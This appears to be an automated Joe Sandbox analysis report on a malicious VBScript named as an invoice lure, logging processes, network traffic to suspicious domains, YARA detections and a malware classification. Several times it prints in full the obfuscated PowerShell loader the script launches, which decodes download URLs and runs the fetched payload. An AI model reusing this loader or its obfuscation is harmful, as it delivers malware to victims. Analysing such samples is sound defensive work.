              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: Joe Sandbox ViewIP Address: 185.221.216.115 185.221.216.115
              Source: Joe Sandbox ViewIP Address: 185.221.216.115 185.221.216.115
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficHTTP traffic detected: GET /wp-includes/img/Appliances.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: adjuntia.ru.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /wp-includes/img/Appliances.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: adjuntia.ru.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: adjuntia.ru.com
              Source: powershell.exe, 00000003.00000002.3317936149.00000266C0F9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://adjuntia.ru.com
              Source: powershell.exe, 00000003.00000002.3438249100.00000266D77E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
              Source: powershell.exe, 00000007.00000002.3329236621.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: wscript.exe, 00000000.00000003.2135299220.0000021ADBB5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2136309922.0000021ADBB75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: wscript.exe, 00000000.00000003.2135299220.0000021ADBB5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2136309922.0000021ADBB75000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000000.00000003.2032932781.0000021ADDAF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2033119338.0000021ADDB1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e6270429c06a4
              Source: wscript.exe, 00000000.00000003.2135299220.0000021ADBB5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2136309922.0000021ADBB75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
              Source: wscript.exe, 00000000.00000003.2033161555.0000021ADDAD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e6270429c0
              Source: powershell.exe, 00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000003.00000002.3317936149.00000266BF1A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3317433390.0000000004E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000003.00000002.3317936149.00000266BF5E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3317936149.00000266C0C44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adjuntia.ru.com
              Source: powershell.exe, 00000003.00000002.3317936149.00000266C0A68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3317936149.00000266BF3C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adjuntia.ru.com/wp-includes/img/Appliances.smi
              Source: powershell.exe, 00000003.00000002.3317936149.00000266BF1A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000007.00000002.3317433390.0000000004E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000003.00000002.3317936149.00000266C0A68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3317936149.00000266BF3C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ambyverce.com/Appliances.smi
              Source: powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ambyverce.com/Appliances.smid
              Source: powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000003.00000002.3317936149.00000266C0605000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownHTTPS traffic detected: 185.221.216.115:443 -> 192.168.2.5:49705 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_5572.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1600, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5572, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Sample has a suspicious name (potential lure to open the executable)
              Source: INVOICE_DF76K.vbsStatic file information: Suspicious name
              Very long command line found
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6705
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6705
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6705Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6705Jump to behavior
              Writes or reads registry keys via WMI
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemic
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848D7B1163_2_00007FF848D7B116
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848D7BE923_2_00007FF848D7BE92
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848E432443_2_00007FF848E43244
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D0EF707_2_04D0EF70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D0F8407_2_04D0F840
              Source: INVOICE_DF76K.vbsInitial sample: Strings found which are bigger than 50
              Source: amsi32_5572.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1600, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5572, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@11/8@1/1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Spisefisk.PurJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqo2ziok.hts.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1600
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5572
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemic
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemic
